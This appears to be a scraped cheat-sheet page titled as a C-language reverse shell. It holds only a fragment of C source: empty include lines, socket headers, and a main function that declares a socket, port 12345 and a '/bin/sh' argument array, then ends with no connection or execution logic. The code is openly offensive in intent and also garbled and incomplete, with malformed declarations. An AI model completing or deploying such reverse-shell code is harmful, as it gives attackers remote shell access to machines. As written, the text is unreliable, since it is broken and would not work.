c-language-reverse-shell
C-LANGUAGE-REVERSE-SHELL
include
include
include
include
include <sys/types.h>
include <sys/socket.h>
include <netinet/in.h>
int main(void) { int sockfd; int lportno = 12345; struct sockaddr_in serv_addr; char const params[] = {"/bin/sh",NULL}; char const environ[] = {NULL};
}
Last updated
Was this helpful?